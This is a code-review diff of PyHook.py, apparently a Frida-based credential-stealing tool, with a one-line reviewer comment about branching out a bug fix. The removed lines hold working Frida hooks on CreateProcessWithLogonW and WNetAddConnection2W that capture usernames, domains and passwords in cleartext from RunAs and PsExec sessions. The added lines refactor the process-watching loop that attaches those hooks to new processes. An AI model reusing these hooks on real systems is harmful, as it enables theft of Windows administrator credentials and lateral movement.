PyHook.py

```diff
@@ -32,411 +23,46 @@ def get_process_by_name(name: str) -> List[psutil.Process]:
-
-		Interceptor.attach(CreateProcessWithLogonW, {
-			onEnter: function (args) {
-
-
-				this.lpUsername = args[0];
-				this.lpDomain = args[1];
-				this.lpPassword = args[2];
-				this.lpCommandLine = args[5];
-			},
-			onLeave: function (args) {
-				send("\\n=============================" + "\\n[+] Retrieving Creds from RunAs.." +"\\n Username    : " + this.lpUsername.readUtf16String() + "\\nCommandline : " + this.lpCommandLine.readUtf16String() + "\\nDomain      : " + this.lpDomain.readUtf16String() + "\\nPassword    : " + this.lpPassword.readUtf16String()+ "\\n=============================");
-
-
-			}
-		});
+def run_thread_pool_for_functions(functions: list):
+    pool = ThreadPool(len(functions))
+    for function in functions:
+        pool.apply_async(function)
+    pool.close()
+    pool.join()
 
-		""")
-        script.on('message', on_message_runas)
-        script.load()
-    except Exception as e:
-        print(str(e))
 
+def wait_for_process(process_name, tag_name, hook_function):
+    running_pids = []
 
-def WaitForPsExec():
-    # Different variants for PsExec process.
-    PsExecList = ["PsExec64.exe", "PsExec.exe", "psexec.exe"]
     while True:
-        # Catch the right process name
-        process = get_process_by_list_names(PsExecList)
-        if (process):
-            processName = process[0].name()
-            if len(processName) and not lockPsExec.locked():
-                lockPsExec.acquire()
-                print("[+] Found {}".format(processName))
-                PsExec(processName)
-                sleep(0.5)
-
-        elif lockPsExec.locked():
-            lockPsExec.release()
-            print("[+] PsExec is dead releasing lock")
-        else:
-            pass
-            sleep(0.5)
-
-
-def PsExec(processName):
-    try:
-        # Same Like CredUI function
-        print("[+] Trying To Attach To {}".format(processName))
-        session = frida.attach(processName)  # add diffrent options of psexec
-        print("[+] Attached PsExec !")
-        script = session.create_script("""
-
-			var WNetAddConnection2W = Module.findExportByName("Mpr.dll", 'WNetAddConnection2W')
-				Interceptor.attach(WNetAddConnection2W, {
-					onEnter: function (args) {
-
-						this.lpUsername = args[2];
-						this.lpPassword = args[1];
-
-					},
-					onLeave: function (args) {
-						send("\\n=============================" + "\\n[+] Retrieving Creds from PsExec.." + "\\nUsername    : " + this.lpUsername.readUtf16String() + "\\nPassword    : " + this.lpPassword.readUtf16String()+"\\n=============================" );
+        processes_alive = get_process_by_list_names(process_name)
+        for process in processes_alive:
+            if process.pid not in running_pids:
+                running_pids.append(process.pid)
+                print(f"[+] Found {tag_name} Window")
+                hook_function(process.pid)
+            # TODO: elif check if pids still alive -> if not then remove from running_pids
```

Comment:
I'd suggest to branch out to a bug pull request before merging the current request.